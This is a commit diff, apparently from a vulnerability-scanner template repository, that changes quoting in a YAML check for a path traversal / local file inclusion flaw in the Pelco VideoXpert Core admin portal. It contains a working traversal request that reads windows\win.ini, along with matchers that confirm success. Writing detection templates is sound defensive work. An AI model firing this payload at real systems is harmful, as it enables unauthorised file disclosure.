Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml
parent
2a268f1324
commit
b4824aba94
|
@ -10,14 +10,14 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini"
|
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "bit app support"
|
- 'bit app support'
|
||||||
- "fonts"
|
- 'fonts'
|
||||||
- "extensions"
|
- 'extensions'
|
||||||
condition: and
|
condition: and
|
||||||
part: body
|
part: body
|
||||||
|
|
Loading…
Reference in New Issue